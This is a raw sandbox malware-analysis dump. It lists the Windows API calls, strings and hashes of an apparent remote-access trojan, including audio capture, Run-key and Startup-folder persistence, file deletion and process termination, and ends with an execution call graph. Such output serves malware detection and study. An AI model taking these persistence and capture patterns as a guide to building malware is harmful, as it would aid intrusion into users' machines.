                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f68304ef7b417aefd933b86cb656289661524de42ad516d4c4f2b0040af23821
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                              • API String ID: 1133728706-3431404234
                                                                                                                                                                                                                              • Opcode ID: 6bb50ad3decbce7ac11564e8d559d2848364a33e9c4b829586c6d77f37ecd432
                                                                                                                                                                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bb50ad3decbce7ac11564e8d559d2848364a33e9c4b829586c6d77f37ecd432
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateStream
                                                                                                                                                                                                                              • String ID: image/png
                                                                                                                                                                                                                              • API String ID: 1369699375-2966254431
                                                                                                                                                                                                                              • Opcode ID: b54d5b6c28edd578483b9d1d1dbdb371e6d235ce46d1bab246ae02b01ce92daa
                                                                                                                                                                                                                              • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54d5b6c28edd578483b9d1d1dbdb371e6d235ce46d1bab246ae02b01ce92daa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                              • String ID: : $Se.
                                                                                                                                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                              • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 00406835
                                                                                                                                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 0040688E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeObjectUninitialize
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                              • API String ID: 887581436-2827799107
                                                                                                                                                                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                              • API String ID: 3660427363-3431404234
                                                                                                                                                                                                                              • Opcode ID: 60d0c4f8d553e275295d1cfac59131d463cdc6a2a25a37665b4b581d2f0ae0ad
                                                                                                                                                                                                                              • Instruction ID: 62a4949b47554db758ef5e9b715c6ec4cc130d120bf99ac1ec1555789b8052d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60d0c4f8d553e275295d1cfac59131d463cdc6a2a25a37665b4b581d2f0ae0ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC01A7B6A00108BFDB049B95DD46EFF7ABDDF44240F10007AF901E2251E6749F009664
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                              • String ID: TUF$xIG
                                                                                                                                                                                                                              • API String ID: 1174141254-2109147017
                                                                                                                                                                                                                              • Opcode ID: 9e7609ae65e6c1456ba02c71c6b86090f2d3b6e0331a5844aa5217f4c56e482f
                                                                                                                                                                                                                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e7609ae65e6c1456ba02c71c6b86090f2d3b6e0331a5844aa5217f4c56e482f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                                                • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                                                                              • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                              • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00473D90,00000020,00475BF4,00475BF4,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00473D90,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                                              • String ID: T=G
                                                                                                                                                                                                                              • API String ID: 2315374483-379896819
                                                                                                                                                                                                                              • Opcode ID: d16fe56752f614b1af9cb076d52015d42818db6ec3ecb46f6f56c0c8a066e5e7
                                                                                                                                                                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d16fe56752f614b1af9cb076d52015d42818db6ec3ecb46f6f56c0c8a066e5e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LocaleValid
                                                                                                                                                                                                                              • String ID: IsValidLocaleName$j=D
                                                                                                                                                                                                                              • API String ID: 1901932003-3128777819
                                                                                                                                                                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                                                                                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                              • API String ID: 3325800564-4028850238
                                                                                                                                                                                                                              • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                                                                                                                                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                              • API String ID: 1872346434-4028850238
                                                                                                                                                                                                                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                                                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0043FAF4
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0043FB5D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: c6b7380bf39078e25bfb7328fff920eab3d83a155a66d29f6de05a2d99af9cce
                                                                                                                                                                                                                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6b7380bf39078e25bfb7328fff920eab3d83a155a66d29f6de05a2d99af9cce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:6.2%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                              Signature Coverage:0.8%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:66
                                                                                                                                                                                                                              execution_graph 40567 441819 40570 430737 40567->40570 40569 441825 40571 430756 40570->40571 40572 43076d 40570->40572 40573 430774 40571->40573 40574 43075f 40571->40574 40572->40569 40585 43034a memcpy 40573->40585 40584 4169a7 11 API calls 40574->40584 40577 4307ce 40578 430819 memset 40577->40578 40586 415b2c 11 API calls 40577->40586 40578->40572 40579 43077e 40579->40572 40579->40577 40582 4307fa 40579->40582 40581 4307e9 40581->40572 40581->40578 40587 4169a7 11 API calls 40582->40587 40584->40572 40585->40579 40586->40581 40587->40572 37584 442ec6 19 API calls 37761 4152c6 malloc 37762 4152e2 37761->37762 37763 4152ef 37761->37763 37765 416760 11 API calls 37763->37765 37765->37762 38338 4466f4 38357 446904 38338->38357 38340 446700 GetModuleHandleA 38343 446710 __set_app_type __p__fmode __p__commode 38340->38343 38342 4467a4 38344 4467ac __setusermatherr 38342->38344 38345 4467b8 38342->38345 38343->38342 38344->38345 38358 4468f0 _controlfp 38345->38358 38347 4467bd _initterm __wgetmainargs _initterm 38348 446810 38347->38348 38349 44681e GetStartupInfoW 38347->38349 38351 446866 GetModuleHandleA 38349->38351 38359 41276d 38351->38359 38355 446896 exit 38356 44689d _cexit 38355->38356 38356->38348 38357->38340 38358->38347 38360 41277d 38359->38360 38402 4044a4 LoadLibraryW 38360->38402 38362 412785 38363 412789 38362->38363 38410 414b81 38362->38410 38363->38355 38363->38356 38366 4127c8 38416 412465 memset ??2@YAPAXI 38366->38416 38368 4127ea 38428 40ac21 38368->38428 38373 412813 38446 40dd07 memset 38373->38446 38374 412827 38451 40db69 memset 38374->38451 38377 412822 38472 4125b6 ??3@YAXPAX 38377->38472 38379 40ada2 _wcsicmp 38380 41283d 38379->38380 38380->38377 38383 412863 CoInitialize 38380->38383 38456 41268e 38380->38456 38476 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38383->38476 38385 41296f 38478 40b633 38385->38478 38390 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38394 412957 CoUninitialize 38390->38394 38399 4128ca 38390->38399 38394->38377 38395 4128d0 TranslateAcceleratorW 38396 412941 GetMessageW 38395->38396 38395->38399 38396->38394 38396->38395 38397 412909 IsDialogMessageW 38397->38396 38397->38399 38398 4128fd IsDialogMessageW 38398->38396 38398->38397 38399->38395 38399->38397 38399->38398 38400 41292b TranslateMessage DispatchMessageW 38399->38400 38401 41291f IsDialogMessageW 38399->38401 38400->38396 38401->38396 38401->38400 38403 4044f7 38402->38403 38404 4044cf GetProcAddress 38402->38404 38408 404507 MessageBoxW 38403->38408 38409 40451e 38403->38409 38405 4044e8 FreeLibrary 38404->38405 38406 4044df 38404->38406 38405->38403 38407 4044f3 38405->38407 38406->38405 38407->38403 38408->38362 38409->38362 38411 414b8a 38410->38411 38412 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38410->38412 38482 40a804 memset 38411->38482 38412->38366 38415 414b9e GetProcAddress 38415->38412 38417 4124e0 38416->38417 38418 412505 ??2@YAPAXI 38417->38418 38419 41251c 38418->38419 38421 412521 38418->38421 38504 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38419->38504 38493 444722 38421->38493 38427 41259b wcscpy 38427->38368 38509 40b1ab free free 38428->38509 38430 40ac5c 38433 40a9ce malloc memcpy free free 38430->38433 38434 40ad4b 38430->38434 38436 40ace7 free 38430->38436 38441 40ad76 38430->38441 38513 40a8d0 7 API calls 38430->38513 38514 4099f4 38430->38514 38433->38430 38434->38441 38522 40a9ce 38434->38522 38436->38430 38510 40aa04 38441->38510 38442 40ada2 38444 40adc9 38442->38444 38445 40adaa 38442->38445 38443 40adb3 _wcsicmp 38443->38444 38443->38445 38444->38373 38444->38374 38445->38443 38445->38444 38528 40dce0 38446->38528 38448 40dd3a GetModuleHandleW 38533 40dba7 38448->38533 38452 40dce0 3 API calls 38451->38452 38453 40db99 38452->38453 38605 40dae1 38453->38605 38619 402f3a 38456->38619 38458 412766 38458->38377 38458->38383 38459 4126d3 _wcsicmp 38460 4126a8 38459->38460 38460->38458 38460->38459 38462 41270a 38460->38462 38653 4125f8 7 API calls 38460->38653 38462->38458 38622 411ac5 38462->38622 38473 4125da 38472->38473 38474 4125f0 38473->38474 38475 4125e6 DeleteObject 38473->38475 38477 40b1ab free free 38474->38477 38475->38474 38476->38390 38477->38385 38479 40b640 38478->38479 38480 40b639 free 38478->38480 38481 40b1ab free free 38479->38481 38480->38479 38481->38363 38483 40a83b GetSystemDirectoryW 38482->38483 38484 40a84c wcscpy 38482->38484 38483->38484 38489 409719 wcslen 38484->38489 38487 40a881 LoadLibraryW 38488 40a886 38487->38488 38488->38412 38488->38415 38490 409724 38489->38490 38491 409739 wcscat LoadLibraryW 38489->38491 38490->38491 38492 40972c wcscat 38490->38492 38491->38487 38491->38488 38492->38491 38494 444732 38493->38494 38495 444728 DeleteObject 38493->38495 38505 409cc3 38494->38505 38495->38494 38497 412551 38498 4010f9 38497->38498 38499 401130 38498->38499 38500 401134 GetModuleHandleW LoadIconW 38499->38500 38501 401107 wcsncat 38499->38501 38502 40a7be 38500->38502 38501->38499 38503 40a7d2 38502->38503 38503->38427 38503->38503 38504->38421 38508 409bfd memset wcscpy 38505->38508 38507 409cdb CreateFontIndirectW 38507->38497 38508->38507 38509->38430 38511 40aa14 38510->38511 38512 40aa0a free 38510->38512 38511->38442 38512->38511 38513->38430 38515 409a41 38514->38515 38516 4099fb malloc 38514->38516 38515->38430 38518 409a37 38516->38518 38519 409a1c 38516->38519 38518->38430 38520 409a30 free 38519->38520 38521 409a20 memcpy 38519->38521 38520->38518 38521->38520 38523 40a9e7 38522->38523 38524 40a9dc free 38522->38524 38526 4099f4 3 API calls 38523->38526 38525 40a9f2 38524->38525 38527 40a8d0 7 API calls 38525->38527 38526->38525 38527->38441 38552 409bca GetModuleFileNameW 38528->38552 38530 40dce6 wcsrchr 38531 40dcf5 38530->38531 38532 40dcf9 wcscat 38530->38532 38531->38532 38532->38448 38553 44db70 38533->38553 38537 40dbfd 38556 4447d9 38537->38556 38540 40dc34 wcscpy wcscpy 38582 40d6f5 38540->38582 38541 40dc1f wcscpy 38541->38540 38544 40d6f5 3 API calls 38545 40dc73 38544->38545 38546 40d6f5 3 API calls 38545->38546 38547 40dc89 38546->38547 38548 40d6f5 3 API calls 38547->38548 38549 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38548->38549 38588 40da80 38549->38588 38552->38530 38554 40dbb4 memset memset 38553->38554 38555 409bca GetModuleFileNameW 38554->38555 38555->38537 38558 4447f4 38556->38558 38557 40dc1b 38557->38540 38557->38541 38558->38557 38559 444807 ??2@YAPAXI 38558->38559 38560 44481f 38559->38560 38561 444873 _snwprintf 38560->38561 38562 4448ab wcscpy 38560->38562 38595 44474a 8 API calls 38561->38595 38564 4448bb 38562->38564 38596 44474a 8 API calls 38564->38596 38566 4448a7 38566->38562 38566->38564 38567 4448cd 38597 44474a 8 API calls 38567->38597 38569 4448e2 38598 44474a 8 API calls 38569->38598 38571 4448f7 38599 44474a 8 API calls 38571->38599 38573 44490c 38600 44474a 8 API calls 38573->38600 38575 444921 38601 44474a 8 API calls 38575->38601 38577 444936 38602 44474a 8 API calls 38577->38602 38579 44494b 38603 44474a 8 API calls 38579->38603 38581 444960 ??3@YAXPAX 38581->38557 38583 44db70 38582->38583 38584 40d702 memset GetPrivateProfileStringW 38583->38584 38585 40d752 38584->38585 38586 40d75c WritePrivateProfileStringW 38584->38586 38585->38586 38587 40d758 38585->38587 38586->38587 38587->38544 38589 44db70 38588->38589 38590 40da8d memset 38589->38590 38591 40daac LoadStringW 38590->38591 38592 40dac6 38591->38592 38592->38591 38594 40dade 38592->38594 38604 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38592->38604 38594->38377 38595->38566 38596->38567 38597->38569 38598->38571 38599->38573 38600->38575 38601->38577 38602->38579 38603->38581 38604->38592 38615 409b98 GetFileAttributesW 38605->38615 38607 40daea 38608 40db63 38607->38608 38609 40daef wcscpy wcscpy GetPrivateProfileIntW 38607->38609 38608->38379 38616 40d65d GetPrivateProfileStringW 38609->38616 38611 40db3e 38617 40d65d GetPrivateProfileStringW 38611->38617 38613 40db4f 38618 40d65d GetPrivateProfileStringW 38613->38618 38615->38607 